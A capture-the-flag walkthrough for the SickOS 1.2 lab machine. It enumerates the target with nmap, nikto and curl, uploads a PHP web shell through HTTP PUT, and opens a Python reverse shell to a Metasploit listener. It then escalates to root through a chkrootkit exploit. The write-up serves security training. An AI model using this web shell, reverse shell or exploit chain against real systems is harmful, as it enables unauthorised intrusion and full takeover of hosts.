Back to Posts

SickOS 1.2

Posted in CTF

Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -

SickOS 1.2

First find the ip doing a quick nmap range scan

nmap -sP

Target is running on

Enumerate our target using nmap

nmap -v -sS -A -T5

Looks like only HTTP and SSH are open…

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).

Opening up the target on a web browser and viewing source reveals..


<img src="blow.jpg">


<!-- NOTHING IN HERE ///\\\ -->>>>

Not much….

You can use nikto to gather more http information

nikto -h

Not much here either.

Now we’ll want to use DirBuster to gather our targets http directories.


The only directory that comes up is /test which we go to. Not seeing any other files or directories besides /test we can use curl to further our enumeration.

curl -vX OPTIONS

We now see this tidbit of information.


This allows http PUT method, which will allow you to upload files into /test

We can upload a test.txt into the /test directory using curl.

curl -vX PUT -d "Greetings Earthling"

VirtualBox issues

This is where I ran into some issues. I was getting 403 errors when trying to upload various files (php, txt, jpg, etc). I remember skimming the SickOS documentation on vulnhub and recall reading that there may be issues when running on VirtualBox.

After rebooting the target a few times, upon boot I noticed an error regarding no hdd space available - which would cause the 403 error. I converted the VMDK to VDI using the VBoxMange tool through cmd.

You’ll open cmd and get to your VirtualBox directory, then run VBoxManage and convert.

c:\Program Files\Oracle\VirtualBox>
VBoxManage clonehd --format VDI "c:\path to original sickos\sickos.vmdk" "c:\new path\sickos.vdi"

Once it’s been cloned as VDI, create a New virtual machine then browse and select to your new .vdi - Boot it up and scan nmap ip ranges to check if the ip has been changed.

Try uploading again and you’ll see we’re back in business.

After testing a bit we find out the target accepts multiple files, including PHP. Knowing this, we can upload a PHP web shell with curl.

curl -X PUT -d '<?php system($_GET["cmd"]);'

Looks like the php file has been written. We can do a quick test by passing some shell commands as encoded url syntax.

curl ""

Getting shell

Now the idea is to get our target machine to throw us (attacker machine) a reverse shell.

On our Attacker machine we’ll listen on port 443 through a reverse handler on Metaspolit. Then pass a python reverse shell through our /test/shell.php using encoded url syntax.

Metasploit listener

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > run

now we’re listening for our target to throw us a reverse shell…

Python Reverse Shell

We can find the python reverse shell script on pentestmonkey.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

Change the ip to your Attackers ip, then run the script through a url encode conversion tool.

Once encoded, run the full command..

curl ""

and we see msf…

msf exploit(handler) > run

[*] Started reverse TCP handler on 
[*] Starting the payload handler...
[*] Command shell session 1 opened ( -> at 2017-02-12 13:24:48 -0500

/bin/sh: 0: can't access tty; job control turned off
$ whoami

Now we have shell, but not root.

Privilege Escalation

This part is probably the most time consuming. Best thing to do is just dig and enumerate as best you can. There are plenty of guides to assist in privilege escalation, and also some common exploits you can check for initially.

Eventually I found chkrootkit was being ran as a daily job. Searching the msf db I found a chkrootkit exploit that fit into the version that was running.

Check to see when it’s ran…

/var/log/syslog | grep chkrootkit

and looks like it’s ran every minute.

Now we can run the shell session in the background then search and set the chkrootkit exploit.

msf exploit(chkrootkit) > sessions

Active sessions

  Id  Type         Information                                             Connection
  --  ----         -----------                                             ----------
  2   shell linux  /bin/sh: 0: can't access tty; job control turned off $ -> (
msf exploit(chkrootkit) > set lport 8080
lport => 1337
msf exploit(chkrootkit) > set session 2
session => 2
msf exploit(chkrootkit) > set lhost
lhost =>
msf exploit(chkrootkit) > run


You should have root now…

[*] exec: whoami


Once you ls files in /root you’ll see the flag “7d03aaa2bf93d80040f3f22ec6ad9d5a.txt”

Custom Cyber Ranges >>

Read Next

Kioptrix 3